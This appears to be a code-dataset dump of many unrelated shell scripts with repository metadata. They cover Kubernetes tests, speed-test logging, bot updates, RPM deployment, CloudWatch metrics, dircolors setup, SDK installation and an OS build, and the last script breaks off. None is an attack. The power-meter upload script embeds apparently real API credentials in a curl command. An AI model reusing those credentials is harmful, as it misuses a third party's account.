kubectl apply -f $DATENLORD_METRICS_TEST
kubectl wait --for=condition=Ready pod metrics-datenlord-test --timeout=120s
kubectl exec -i metrics-datenlord-test -- bash -c "echo test > /usr/share/nginx/html/testfile"
kubectl exec -i metrics-datenlord-test -- bash -c "cat /usr/share/nginx/html/testfile"
sleep $PROMETHUES_WAIT_TIME
NODE_IP=`kubectl get nodes -A -o wide | awk 'FNR == 2 {print $6}'`
# Datanlord logging test
curl -s "http://${NODE_IP}:31001/k8s-csi-datenlord-*/_search" | python -c "import sys, json; assert json.load(sys.stdin)['hits']['total']['value'] > 0"
| true |
bfeeff74e31fd2221b76d2dd5cecafcdced13954 | Shell | diogopereira/SpeedTestCollector | /startspeedtest.sh | UTF-8 | 2,291 | 4.25 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
function usage
{
echo "Usage: startspeedtest [OPTIONS]"
echo ""
echo "Options GNU long option Meaning"
echo "-h --help Show this message"
echo "-d <directory> --directory <directory> Destination file to where the result should be written. By default is in \"/var/www/speedtestresults\""
echo "-o <filename> --testoutput <filename> If this option is used, the last output from the speedtest script will be kept in the designed location"
echo "-s <script> --script <script> Speed test script. If this option is not used, by default, it will be used /root/SpeedTestCollector/speedtest-cli-modified"
}
#Starting script at time $hour...
hour=$(date +"%H:%M")
now=$(date +"%m_%d_%Y")
directory="/var/www/speedtestresults"
output=""
script="/root/SpeedTestCollector/speedtest-cli-modified"
while [ "$1" != "" ]; do
case $1 in
-d | --directory ) shift
directory="$1"
;;
-o | --testoutput ) shift
output="$1"
;;
-s | --script ) shift
script="$1"
;;
-h | --help ) usage
exit
;;
* ) usage
exit 1
esac
shift
done
#Defining output folder
file="$directory/result_$now.csv"
echo "Sending result to \"$file\""
tempOutput="/var/www/speedtestresults/output.txt"
#Checking if using $output
if ! [ -z "$output" ]
then
echo "Using output \"$output\"."
tempOutput="$output"
fi
#Execute script to test speed
echo "Starting to execute the speed test..."
"$(echo $script)" > "$(echo $tempOutput)"
echo "Output saved at $tempOutput... retrieving values..."
#Retrive data from test
download="$(sed '7q;d' $tempOutput)"
upload="$(sed '9q;d' $tempOutput)"
if [ -z "$download" ]
then
download="0"
fi
download="$(echo $download | sed -r 's/\.+/,/g')"
if [ -z "$upload" ]
then
upload="0"
fi
upload="$(echo $upload | sed -r 's/\.+/,/g')"
echo "Download speed at $download"
echo "Upload speed at $upload"
echo "Saving data..."
echo "$hour;$download;$upload" >> "$file"
#If no output was set, remove file, otherwise, keep it
if [ -z "$output" ]
then
echo "Removing temporary files..."
rm "$(echo $tempOutput)"
fi
echo "Done."
| true |
2081b5a8527e46539d63c5ba7defa36c3859ff8b | Shell | tvararu/smib-commands | /update.sh | UTF-8 | 717 | 3.1875 | 3 | [] | no_license | #!/bin/bash
cd /home/irccat/smib
#what commit are we now?
COMMIT=$(git rev-parse HEAD)
#if the password is a merge conflict, manual update is needed.
git stash --quiet
git pull --quiet origin master
git stash pop --quiet
if [ "$?" == "0" ]; then
echo -n "$1: git pull finished successfully. "
else
echo -n "$1: git pull failed, probably merge conflict, do it yourself. "
exit 0;
fi
#did we actually change?
if [ $COMMIT == $(git rev-parse HEAD) ]; then
echo "No changes, stop that."
exit 0;
fi
#make the new bot live (systemd respawn)
echo "HEAD is now at \"$(git log --oneline -n 1)\", will shortly kill myself, goodbye world! :-("
echo '/usr/bin/killall smib.pl' | /usr/bin/at now + 1 minutes 2>/dev/null
| true |
c004248eb772b87030e047e82fc15fa777e202f0 | Shell | m-lab/neubot-support | /deploy.sh | UTF-8 | 888 | 3.6875 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/sh
# Public domain, 2013 Simone Basso <bassosimone@gmail.com>
#
# Manually deploy the RPM on M-Lab
#
DEBUG=
if [ $# -lt 2 ]; then
echo "usage: $0 rpm host [host ...]" 1>&2
exit 1
fi
RPM=$1
shift
for SLIVER in $*; do
echo "=== BEGIN DEPLOY $SLIVER ==="
(
set -e
$DEBUG mlab_scp $RPM $SLIVER:
$DEBUG mlab_ssh $SLIVER sudo init/stop.sh || true
# Note: avoid sliver recreation
$DEBUG mlab_ssh $SLIVER sudo rm -f /etc/mlab/slice.installed
$DEBUG mlab_ssh $SLIVER sudo yum -y update $RPM
# Idempotent
$DEBUG mlab_ssh $SLIVER sudo touch /etc/mlab/slice.installed
$DEBUG mlab_ssh $SLIVER sudo init/initialize.sh || true
$DEBUG mlab_ssh $SLIVER sudo init/start.sh || true
$DEBUG mlab_ssh $SLIVER rm $RPM
)
echo "=== END DEPLOY $SLIVER ==="
echo ""
echo ""
sleep 30
done
| true |
a28db7f9f63cdf21e82a60db2b2e5c0f3165ff13 | Shell | sushena/Scripts | /Shell/SG_and_GCD_1_install_v1.sh | UTF-8 | 1,080 | 3.96875 | 4 | [] | no_license | #!/bin/bash
usage() { echo "Usage: $0 [-y <yum command, either install or update>] " 1>&2; exit 1; }
YUM_CMD=
set -e
while getopts ":y:" o; do
case "${o}" in
y)
YUM_CMD=${OPTARG}
;;
*)
usage
;;
esac
done
shift $((OPTIND-1))
if [[ ! -z "${YUM_CMD}" && "${YUM_CMD}" == "install" ]]
then
#echo -e "I am into _main_ ${YUM_CMD} \n"
echo -e "*** Please update the REPO to se-server-experimental ***\n"
echo -e "Initialiazing the repo \n"
sudo yum makecache fast
echo -e "Installing Senti-Configure \n"
sudo yum -y install sentient-configure
echo -e "1, Update the IP of other components under path /etc/sentient-configure/sentient-configure.conf
2, Update email,Domain and credentials under path /etc/sentient-configure/.secrets/sentient-configure.properties \n"
echo -e "**********************************\n"
echo -e "Then proceed with script 2 for further setup\n"
else
echo -e "Invalid entry \n"
exit 1
fi
| true |
7e38b046205eb5d637a2513c9918de463984a07a | Shell | alces-software/flight-appliance-support | /aws-cloudformation/aws-tools/extras/custom-cloudwatch/put-queued.sh | UTF-8 | 497 | 2.65625 | 3 | [] | no_license | #!/bin/bash -l
# Compute group name should be fed in through cloud-init or other means
computegroup="alces1-ComputeGroup-13L5PPGC0IG6V"
# AWS requires timestamp in the following format
timestamp=$(date +'%Y-%m-%d'T'%T'.000Z)
queued=$(qstat -u \* | awk 'NR > 2{print $5}' | wc -l)
/opt/clusterware/opt/aws/bin/aws cloudwatch put-metric-data --region "eu-west-1" --metric-name Queued --namespace "ALCES-SGE" --dimensions "AutoScalingGroupName=${computegroup}" --value $queued --timestamp $timestamp
| true |
97e0a158b3ef748e6099b1e4b6a1a1ec58007e7a | Shell | flyrjh/ekm | /get-meter-data.sh | UTF-8 | 1,061 | 3.4375 | 3 | [] | no_license | #!/bin/sh
# 2014-11-20 Joe Hughes ekm@skydoo.net
# This script runs a program that gets RS-485 data from an EKM OmniMeter v4,
# saves the data to a csv file, and calls 'curl' to upload to wattvision.com
# This script is meant to be called from cron every minute, and should not
# generate any output other than what goes in the listed files.
OUT=/mnt/nas/ekm/$$.tmp
LOG=/mnt/nas/ekm/log.csv
#DT=`date "+%Y%m%d-%H%M%S"`
DT=`date +%s`
/root/bin/ekm > $OUT
RC=$?
if [ "$RC" -ne 0 ]; then
sleep 1
# try again
/root/bin/ekm > $OUT
RC=$?
if [ "$RC" -ne 0 ]; then
rm $OUT
exit;
fi
fi
KWH=`cat $OUT | awk '{print $1}'`
P1=`cat $OUT | awk '{print $2}'`
P2=`cat $OUT | awk '{print $3}'`
WATTS=`cat $OUT | awk '{print $4}'`
rm $OUT
echo $DT,$KWH,$P1,$P2,$WATTS>> $LOG
curl -d "{\"sensor_id\":\"15909802\",\"api_id\":\"vifpx9ty568qw7d4tqggf8bcgk06q56p\",\"api_key\":\"51pupxvatzj4r2u7fb4dmkpo46q2znlb\",\"watts\":\"$WATTS\",\"watthours\":\"$KWH\"}" http://www.wattvision.com/api/v0.2/elec >/dev/null 2>&1
#rrdtool update /mnt/nas/ekm/prod.rrd $DT:$WATTS
rrdtool update /mnt/nas/ekm/prod.rrd $DT:$KWH:$P1:$P2:$WATTS
| true |
7a8d9cc6f55cfc549c1cd6a3128d6d242f85aaf6 | Shell | jtsagata/ultimate-colors | /support/setup-dir-colors | UTF-8 | 744 | 3.6875 | 4 | [] | no_license | #!/usr/bin/env bash
# With ideas from:
# https://github.com/seebi/dircolors-solarized
SCHEME=$1
dir=$(dirname "$0")
scheme_dir=$dir/../gnome-colors/$SCHEME
if [ ! -d "${scheme_dir}" ] ; then
echo "Invalid profile. Choose Light or Dark"
exit;
fi
dircolors_file="${HOME}/.config/dotfiles/dircolors"
cp $scheme_dir/dircolors ${dircolors_file}-$SCHEME
ln -sf ${dircolors_file}-$SCHEME ${dircolors_file}
eval `dircolors ${dircolors_file}`
#
# Demo
#
if [[ "$show_sample" == "ON" ]]; then
if [ ! -d "/tmp/dircolors-solarized-demo" ] ; then
mkdir -p /tmp/dircolors-solarized-demo
sudo tar xfj $dir/support/test-directory.tar.bz2 -C /tmp/dircolors-solarized-demo
fi
command ls --color /tmp/dircolors-solarized-demo/test-directory
fi | true |
352c4f64058eccd1cfe2556c5dfc7d0c269f71e2 | Shell | doegox/nfc-live | /content_for_iso/driver-scl3711/add.sh | UTF-8 | 473 | 3 | 3 | [] | no_license | #!/bin/bash
if [ ! -e download/scx371x_*_linux_32bit.tar.gz ]; then
echo "SCL3711_driver: Error missing archive scx371x_*_linux_32bit.tar.gz, please run prepare.sh first"
exit 1
fi
mkdir -p ../@config/includes.chroot/usr/lib/pcsc/drivers/
tar xzf download/scx371x_*_linux_32bit.tar.gz --wildcards --strip-components=2 -C ../@config/includes.chroot/usr/lib/pcsc/drivers/ scx371x_*_linux_32bit/proprietary/SCx371x.bundle
mkdir -p ../@config
rsync -av config/ ../@config
| true |
2a4d5a62622da278602c96fc04c5c1e1cc99ceb1 | Shell | jiazhang0/meta-rpm-signing | /recipes-devtools/rpm/files/rpm-key-import.sh | UTF-8 | 256 | 3.34375 | 3 | [] | no_license | #!/bin/sh
keydir="/etc/pki/rpm-gpg"
[ ! -d "$keydir" ] && exit 0
for keyfile in `ls $keydir/RPM-GPG-KEY-*`; do
[ ! -f "$keyfile" ] && continue
! rpm --import "$keyfile" &&
echo "Unable to import RPM key $keyfile" && exit 1
done
exit 0
| true |
0706d6d1d159175f32ea56bc71155535c5868f55 | Shell | katsuyukishimbo/SesLambda | /scripts/create_s3.bash | UTF-8 | 693 | 3.453125 | 3 | [] | no_license | #!/usr/bin/env bash
#
# example:
# ./create_s3.bash
# ./create_s3.bash --prd
set -e
cd `dirname $0`/./
readonly TEMPALTE_FILE="./s3_template.yml"
env="stg"
[[ "${1}" = "--prd" ]] && isPrd=true || isPrd=false
"${isPrd}" && echo "****** Create Bucket Production Mode!!! ******"
"${isPrd}" && env="prd"
stack_name="${env}-email-bounce-bucket"
aws cloudformation deploy \
--stack-name ${stack_name} \
--template-file "${TEMPALTE_FILE}" \
--parameter-overrides \
Env=${env} \
--profile us-east-1-user \
aws cloudformation update-termination-protection \
--enable-termination-protection \
--stack-name ${stack_name} \
--profile us-east-1-user \
exit 0 | true |
754143eeee73a2a1099b068fb948371895b76dbb | Shell | gavinning/fast-deploy | /deploy.sh | UTF-8 | 518 | 2.796875 | 3 | [] | no_license | #!/bin/bash
folder="app/fe"
server="http://127.0.0.1:9500"
# cmd="npm%20install%20%26%26%20pm2%20startOrReload%20ecosystem.config.dev.json"
# cmd="npm%20i%20&&%20npm%20run%20build"
cmd=""
mkdir -p .deploy/
rm -f .deploy/**.tgz
file=`npm pack`
mv ${file} ./.deploy/
echo
echo "PACK: $file"
echo "FOLDER: $folder"
echo "CMD: ${cmd}"
echo
echo UPLOADING...
echo
curl \
-F "file=@./.deploy/${file}" \
"${server}/deploy?afterRun=${cmd}&folder=${folder}"
echo ---
echo "[deploy]: $server"
echo "[server]: $server"
echo
| true |
878627b60877049d17858abaddfedc066e81b4ba | Shell | moisesguimaraes/dotfiles | /bin/hack | UTF-8 | 614 | 3.921875 | 4 | [
"MIT",
"BSD-3-Clause"
] | permissive | #!/bin/bash -e
# hack: Rebase the latest changes from upstream into your feature branch
CURRENT=$(git symbolic-ref --short HEAD) || exit 0
if [[ $CURRENT == "main" ]] || [[ $CURRENT == "master" ]]; then
echo -e "can't hack on $CURRENT"
exit 0
fi
UPSTREAM=$(git remote | grep -w upstream || echo origin)
MAIN=$(git branch | grep -w main || echo master)
echo -e "Rebasing '$CURRENT' on top of '$UPSTREAM/$MAIN'"
git checkout $MAIN
git pull $UPSTREAM $MAIN
if [[ $UPSTREAM == "upstream" ]]; then
echo -e "Updating 'origin/$MAIN'"
git push origin $MAIN
fi
git checkout $CURRENT
git rebase $MAIN
| true |
fe2c4ba9176899da2e5c832465e2a717ace0bb65 | Shell | dslm4515/BMLFS | /build-scripts/libgdata.build | UTF-8 | 1,708 | 3.046875 | 3 | [] | no_license | #! /bin/bash
# libgdata
# Source: https://download.gnome.org/sources/libgdata/0.17/libgdata-0.17.13.tar.xz
#
# $BUILD = Directory to temporarily install
# $PKGS = Directory to store built packages
#
# DEPS
# Required: libsoup, gnome-online-accounts, GTK+3, JSON-GLib, Vala
# Recommended: Gcr, git, gobject-introspection
# Optional: GTK-Doc, liboauth, uhttpmock
mkdir build &&
cd build &&
meson --prefix=/usr -Dgtk_doc=false \
-Dalways_build_tests=false \
-Doauth1=enabled .. &&
read -p "Compile?" && ninja -j2 &&
sudo -S DESTDIR=$BUILD ninja install &&
cd $BUILD && sudo -S mkdir -v ${BUILD}/install &&
cat > /tmp/slack-desc << "EOF"
# HOW TO EDIT THIS FILE:
# The "handy ruler" below makes it easier to edit a package description. Line
# up the first '|' above the ':' following the base package name, and the '|'
# on the right side marks the last column you can put a character in. You must
# make exactly 11 lines for the formatting to be correct. It's also
# customary to leave one space after the ':' except on otherwise blank lines.
|-----handy-ruler------------------------------------------------------|
libgdata: libgdata (library to access online services)
libgdata:
libgdata: Libgdata is a GLib-based library for accessing online service APIs
libgdata: using the GData protocol --- most notably, Google's services. It
libgdata: provides APIs to access the common Google services, and has full
libgdata: asynchronous support.
libgdata:
libgdata:
libgdata:
libgdata:
libgdata:
EOF
sudo -S mv -v /tmp/slack-desc install/ &&
sudo -S makepkg -l y -c n $PKGS/libgdata-0.17.13-$(uname -m)-mlfs.txz &&
sudo -S rm -rf ${BUILD}/*
| true |
d2aa8f3f9855dfbb30bcf25e774f58d346e7bcc8 | Shell | Alexgunning/dotfiles | /.zshrc | UTF-8 | 5,529 | 2.578125 | 3 | [] | no_license | # If you come from bash you might have to change your $PATH.
# export PATH=$HOME/bin:/usr/local/bin:$PATH
# Path to your oh-my-zsh installation.
export ZSH=~/.oh-my-zsh
# Set name of the theme to load. Optionally, if you set this to "random" # it'll load a random theme each time that oh-my-zsh is loaded.
# See https://github.com/robbyrussell/oh-my-zsh/wiki/Themes
ZSH_THEME="alex-pygmalion"
# Uncomment the following line to use case-sensitive completion.
# CASE_SENSITIVE="true"
# Uncomment the following line to use hyphen-insensitive completion. Case
# sensitive completion must be off. _ and - will be interchangeable.
# HYPHEN_INSENSITIVE="true"
# Uncomment the following line to disable bi-weekly auto-update checks.
# DISABLE_AUTO_UPDATE="true"
# Uncomment the following line to change how often to auto-update (in days).
# export UPDATE_ZSH_DAYS=13
# Uncomment the following line to disable colors in ls.
# DISABLE_LS_COLORS="true"
# Uncomment the following line to disable auto-setting terminal title.
DISABLE_AUTO_TITLE="true"
# Uncomment the following line to enable command auto-correction.
# ENABLE_CORRECTION="true"
# Uncomment the following line to display red dots whilst waiting for completion.
# COMPLETION_WAITING_DOTS="true"
# Uncomment the following line if you want to disable marking untracked files
# under VCS as dirty. This makes repository status check for large repositories
# much, much faster.
# DISABLE_UNTRACKED_FILES_DIRTY="true"
# Uncomment the following line if you want to change the command execution time
# stamp shown in the history command output.
# The optional three formats: "mm/dd/yyyy"|"dd.mm.yyyy"|"yyyy-mm-dd"
# HIST_STAMPS="mm/dd/yyyy"
# Would you like to use another custom folder than $ZSH/custom?
# ZSH_CUSTOM=/path/to/new-custom-folder
# Which plugins would you like to load? (plugins can be found in ~/.oh-my-zsh/plugins/*)
# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/
# Example format: plugins=(rails git textmate ruby lighthouse)
# Add wisely, as too many plugins slow down shell startup.
plugins=(git virtualenv)
source $ZSH/oh-my-zsh.sh
# User configuration
# export MANPATH="/usr/local/man:$MANPATH"
# You may need to manually set your language environment
# export LANG=en_US.UTF-8
# Preferred editor for local and remote sessions
# if [[ -n $SSH_CONNECTION ]]; then
# export EDITOR='vim'
# else
# export EDITOR='mvim'
# fi
# Compilation flags
# export ARCHFLAGS="-arch x86_64"
# ssh
# export SSH_KEY_PATH="~/.ssh/rsa_id"
# Set personal aliases, overriding those provided by oh-my-zsh libs,
# plugins, and themes. Aliases can be placed here, though oh-my-zsh
# users are encouraged to define aliases within the ZSH_CUSTOM folder.
# For a full list of active aliases, run `alias`.
#
# Example aliases
# alias zshconfig="mate ~/.zshrc"
# alias ohmyzsh="mate ~/.oh-my-zsh"
alias ls="ls -Gp"
#alias vi="nvim"
#alias vim="nvim"
alias vi="nvim"
alias vim="nvim"
alias vimr="/Applications/MacVim.app/Contents/MacOS/Vim"
alias gvim='/Applications/MacVim.app/Contents/MacOS/Vim -g'
alias mvim='/Applications/MacVim.app/Contents/MacOS/Vim -g'
# alias python="python3"
alias z="vi ~/.zshrc"
alias sz="source ~/.zshrc"
alias s="git status"
alias k="gitk --all&"
alias gh="grep_history"
alias test="run_test"
alias drop="mongo RoninServer --eval 'db.dropDatabase()'"
alias load="mongorestore -d RoninServer --archive=/Users/cfsagunning/dbs/RoninServer.Devnode.2017-07-19.5pm.gz"
alias reload="mongo RoninServer --eval 'db.dropDatabase()'; mongorestore -d RoninServer --archive=/Users/cfsagunning/dbs/RoninServer.Devnode.2017-07-19.5pm.gz; mongo RoninServer --eval 'db.agendaJobs.drop()'"
alias graph="git log --graph --oneline --all"
alias getgrunt="npm install grunt grunt-cli grunt-contrib-watch grunt-shell"
alias dtest="rm -rf ~/ronin_server_node/src/tests"
alias utest="git checkout -- src/tests"
alias reb="npm run rebuild && npm run restart"
alias AndroidStudio="open -a /Applications/Android\ Studio.app"
alias caf="caffeinate -d"
alias nuget="mono /usr/local/bin/nuget.exe"
# alias empty="git commit --allow-empty -m 'empty commit'"
export ANDROID_HOME='/Users/cfsagunning/Library/Android/sdk'
export PATH=${PATH}:${ANDROID_HOME}/tools
export PATH=${PATH}:${ANDROID_HOME}/platform-tools
export PATH=/usr/local/bin/python3:$PATH
function empty() {
branch=$(git branch | awk '/^\*/ { print $2 }' | grep -o 'RWS-[0-9]\+')
commitmessage="${branch} empty commit"
git commit --allow-empty -m $commitmessage
}
#source ~/prefs/git-completion.bash
PATH=~/scripts:$PATH
export DYLD_FORCE_FLAT_NAMESPACE=1
alias cdf="eval \"cd \\\"\\\`osascript -e 'tell app \\\\\\\"Finder\\\\\\\" to return the POSIX path of (target of window 1 as alias)'\\\`\\\"\""
#bindkey -v
#export KEYTIMEOUT=1
#####PASTED STUFF
#function zle-line-init zle-keymap-select {
#VIM_PROMPT="%{$fg_bold[yellow]%} [% NORMAL]% %{$reset_color%}"
#RPS1="${${KEYMAP/vicmd/$VIM_PROMPT}/(main|viins)/} $EPS1"
#zle reset-prompt
#}
##FIX DOESN'T WORK
#bindkey jk vi-cmd-mode
#zle -N zle-line-init
#zle -N zle-keymap-select
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
# added by travis gem
[ -f /Users/cfsagunning/.travis/travis.sh ] && source /Users/cfsagunning/.travis/travis.sh
if [ /usr/local/bin/kubectl ]; then source <(kubectl completion zsh); fi
source /usr/local/bin/aws_zsh_completer.sh
| true |
27796bcc931aac9c860b42df6e1309f0ca19c5f8 | Shell | Kefikhalil/holberton-system_engineering-devops | /0x04-loops_conditions_and_parsing/4-if_9_say_hi | UTF-8 | 181 | 3.46875 | 3 | [] | no_license | #!/usr/bin/env bash
# displays Holberton School 10 times then hi at 9th
a=1
while [ $a -le 10 ]
do
echo "Holberton School"
if [ $a -eq 9 ]
then
echo "Hi"
fi
a=$((a+1))
done | true |
481787be3658ef6e6a5165787aed567fec5dc229 | Shell | SteveMoody73/amiga-gcc | /sdk/install | UTF-8 | 6,646 | 3.4375 | 3 | [] | no_license | #!/bin/bash
if [ ! -e "sdk/$2.sdk" ]; then
echo "sdk/$2.sdk not found"
exit 1
fi
case $1 in
install)
while IFS='' read -r line || [[ -n "$line" ]]; do
a=(${line//:/ })
case ${a[0]} in
Short | Version | Author | Uploader | Type | Replaces | Architecture)
echo "$line"
;;
Url)
file=$(basename ${a[2]})
if [ "${a[1]}" == "git" ]; then
if [ ! -e "projects/$file" ]; then
pushd projects
git clone ${a[1]}:${a[2]} || rm -rf $file; exit 1
popd;
fi
pushd projects/$file
git pull
popd
rsync projects/$file/* build/$2/
else
if [ ! -e "download/$file" ]; then
echo wget ${a[1]}:${a[2]} -O download/$file
wget ${a[1]}:${a[2]} -O download/$file || (rm download/$file; exit 1)
fi
if [ ! -e "build/$2" ] || [ "$(ls -l build/$2)" == "total 0" ]; then
mkdir -p build/$2
pushd build/$2
lha x "../../download/$file" && $3/bin/lha x "../../download/$file"
popd
fi
fi
;;
fd2sfd)
fd=${a[1]}
proto=${a[2]}
file=$(basename $fd)
name=${file%???}
mkdir -p $3/m68k-amigaos/lib/sfd/
$3/bin/fd2sfd -o $3/m68k-amigaos/lib/sfd/$name.sfd $3/m68k-amigaos/lib/fd/$fd $3/m68k-amigaos/include/$proto || exit 1
;;
sfdc)
sfd=${a[1]}
file=$(basename $sfd)
name=${file%????}
mkdir -p $3/m68k-amigaos/include/proto/
$3/bin/sfdc --mode=proto --target=m68k-amigaos --output=$3/m68k-amigaos/include/proto/$name.h $3/m68k-amigaos/lib/sfd/$sfd || exit 1
sed -i.bak -e 's/\(<clib\/.*>\)/\L\1/' -e 's/\(<defines\/.*>\)/\L\1/' -e 's/\(<inline\/.*>\)/\L\1/' -e 's/\(<pragmas\/.*>\)/\L\1/' $3/m68k-amigaos/include/proto/$name.h
rm $3/m68k-amigaos/include/proto/$name.h.bak
mkdir -p $3/m68k-amigaos/include/inline/
$3/bin/sfdc --mode=macros --target=m68k-amigaos --output=$3/m68k-amigaos/include/inline/$name.h $3/m68k-amigaos/lib/sfd/$sfd || exit 1
mkdir -p $3/m68k-amigaos/include/lvo/
$3/bin/sfdc --mode=lvo --target=m68k-amigaos --output=$3/m68k-amigaos/include/proto/$name.i $3/m68k-amigaos/lib/sfd/$sfd || exit 1
if [ "${a[2]}" != "" ] && [ "${a[3]}" != "" ]; then
echo fixup names from ${a[2]} to ${a[3]}
echo sed -i.bak -e "s/${a[2]}/${a[3]}/" $3/m68k-amigaos/include/proto/$name.h
sed -i.bak -e "s/${a[2]}/${a[3]}/" $3/m68k-amigaos/include/proto/$name.h
sed -i.bak -e "s/${a[2]}/${a[3]}/" $3/m68k-amigaos/include/proto/$name.i
sed -i.bak -e "s/${a[2]}/${a[3]}/" $3/m68k-amigaos/include/inline/$name.h
rm $3/m68k-amigaos/include/proto/$name.h.bak $3/m68k-amigaos/include/proto/$name.i.bak $3/m68k-amigaos/include/inline/$name.h.bak
fi
;;
stubs)
sfd=${a[1]}
file=$(basename $sfd)
name=${file%????}
$3/bin/sfdc --mode=autoopen --target=m68k-amigaos --output=build/$2/$name.c $3/m68k-amigaos/lib/sfd/$name.sfd || exit 1
sed -i.bak -e 's/__inline//g' -e 's/: \"d0\",/:/g' build/$2/$name.c || exit 1
echo $3/bin/m68k-amigaos-gcc -Os -noixemul -fomit-frame-pointer build/$2/$name.c -c
$3/bin/m68k-amigaos-gcc -Os -noixemul -fomit-frame-pointer build/$2/$name.c -c -o build/$2/$name.o || exit 1
echo $3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libstubs.a build/$2/$name.o
(
flock -x 200
$3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libstubs.a build/$2/$name.o || exit 1
$3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libb/libstubs.a build/$2/$name.o || exit 1
$3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libm020/libstubs.a build/$2/$name.o || exit 1
$3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libm020/libb/libstubs.a build/$2/$name.o || exit 1
$3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libm020/libb32/libstubs.a build/$2/$name.o || exit 1
) 200>/tmp/amiga-gcc-libstubs-lock
;;
lib)
sfd=${a[1]}
file=$(basename $sfd)
name=${file%????}
$3/bin/sfdc --mode=stubs --target=m68k-amigaos --output=build/$2/lib$2.c $3/m68k-amigaos/lib/sfd/$name.sfd || exit 1
sed -i.bak -e 's/__inline//g' -e 's/: \"d0\",/:/g' build/$2/lib$2.c || exit 1
echo $3/bin/m68k-amigaos-gcc -Os -noixemul -fomit-frame-pointer build/$2/lib$2.c -c
$3/bin/m68k-amigaos-gcc -Os -noixemul -fomit-frame-pointer build/$2/lib$2.c -c -o build/$2/lib$2.o || exit 1
echo $3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/lib$2.a build/$2/lib$2.o
$3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/lib$2.a build/$2/lib$2.o || exit 1
;;
redirinc)
echo creating redirecting header $3/m68k-amigaos/include/${a[1]}
echo "#include \"${a[2]}\"" >$3/m68k-amigaos/include/${a[1]}
;;
symlink)
echo creating symlink from $3/m68k-amigaos/${a[2]} to $3/m68k-amigaos/${a[1]}
rm -rf $3/m68k-amigaos/${a[2]}
ln -s $3/m68k-amigaos/${a[1]} $3/m68k-amigaos/${a[2]}
;;
*)
if [ "$line" != "" ]; then
if [ "${a[1]}" == "=" ]; then
file=${a[2]}
line=${a[0]}
cp build/$2/$line build/$2/$(dirname $line)/$file
else
file=$(basename $line)
fi
dir=$(basename $(dirname $line))
if [[ $file == *.h ]] || [[ $file == *.i ]]; then
mkdir -p "$3/m68k-amigaos/include/$dir"
echo cp "build/$2/$line" "$3/m68k-amigaos/include/$dir/$file"
cp "build/$2/$line" "$3/m68k-amigaos/include/$dir/$file"
elif [[ $file == *.guide ]]; then
mkdir -p "$3/m68k-amigaos/guide"
echo cp "build/$2/$line" "$3/m68k-amigaos/guide/$file"
cp "build/$2/$line" "$3/m68k-amigaos/guide/$file"
elif [[ $file == *.doc ]]; then
mkdir -p "$3/m68k-amigaos/doc"
echo cp "build/$2/$line" "$3/m68k-amigaos/doc/$file"
cp "build/$2/$line" "$3/m68k-amigaos/doc/$file"
elif [[ $file == *.sfd ]]; then
mkdir -p "$3/m68k-amigaos/lib/sfd"
echo cp "build/$2/$line" "$3/m68k-amigaos/lib/sfd/$file"
cp "build/$2/$line" "$3/m68k-amigaos/lib/sfd/$file"
elif [[ $file == *.fd ]]; then
mkdir -p "$3/m68k-amigaos/lib/fd"
echo cp "build/$2/$line" "$3/m68k-amigaos/lib/fd/$file"
cp "build/$2/$line" "$3/m68k-amigaos/lib/fd/$file"
elif [[ $file == *.a ]]; then
echo cp "build/$2/$line" "$3/m68k-amigaos/lib/$file"
cp "build/$2/$line" "$3/m68k-amigaos/lib/$file"
fi
fi
;;
esac
done < "sdk/$2.sdk"
;;
clean)
rm -rf build/$2
;;
esac
| true |
3ebf878d5920f4abdd87a78682c2bd8082437568 | Shell | joseph8th/unm-cs | /CS251_projects/SAry/conf_script | UTF-8 | 680 | 3.59375 | 4 | [] | no_license | #!/bin/bash
# conf_script -- Run SPQR with sample configuration files in ./sampleconf/
##### Functions
function usage
{
echo "usage: conf_script [[[-nl] [-i]] | [-h]]"
}
##### Main
interactive=
filename=~/system_page.html
while [ "$1" != "" ]; do
case $1 in
-f | --file ) shift
filename=$1
;;
-i | --interactive ) interactive=1
;;
-h | --help ) usage
exit
;;
* ) usage
exit 1
esac
shift
done | true |
0713918f13e753dff8eb3fe31895c61a91c11ff7 | Shell | JorgeGarciaxyz/dotfiles | /linux/tmux/scripts/apptegy.sh | UTF-8 | 895 | 3.515625 | 4 | [] | no_license | #!/bin/bash
SESSION="work"
# 1. First you check if a tmux session exists with a given name.
tmux has-session -t=$SESSION 2> /dev/null
# 2. Create the session if it doesn't exists.
if [[ $? -ne 0 ]]; then
TMUX='' tmux new-session -d -s "$SESSION"
tmux rename-window -t 0 'ts'
tmux send-keys -t $SESSION:0 "cd ~/Work/thrillshare" C-m "clear" C-m
tmux new-window -t $SESSION:1 -n 'ts vim'
tmux send-keys -t $SESSION:1 "cd ~/Work/thrillshare" C-m "clear" C-m
tmux new-window -t $SESSION:2 -n 'forms'
tmux send-keys -t $SESSION:2 "cd ~/Work/forms" C-m "clear" C-m
tmux new-window -t $SESSION:3 -n 'forms vim'
tmux send-keys -t $SESSION:3 "cd ~/Work/forms" C-m "clear" C-m
tmux new-window -t $SESSION:4 -n 'shell'
fi
# 3. Attach if outside of tmux, switch if you're in tmux.
if [[ -z "$TMUX" ]]; then
tmux attach -t "$SESSION"
else
tmux switch-client -t "$SESSION"
fi
| true |
36207205ec3658fed42b0132193c3578369dac09 | Shell | ryanwilsond/LowLevel | /EMD/OperatingSystems/COS.0.4/run.sh | UTF-8 | 563 | 2.8125 | 3 | [] | no_license | #assemble boot.s file
as --32 src/boot.s -o boot.o
#compile kernel.c file
gcc -m32 -c src/kernel.c -o kernel.o -std=gnu99 -ffreestanding -O2 -Wall -Wextra
#linking the kernel with kernel.o and boot.o files
ld -m i386pe -T src/link.ld kernel.o boot.o -o COS.bin -nostdlib
#check MyOS.bin file is x86 multiboot file or not
grub-file --is-x86-multiboot COS.bin
#building the iso file
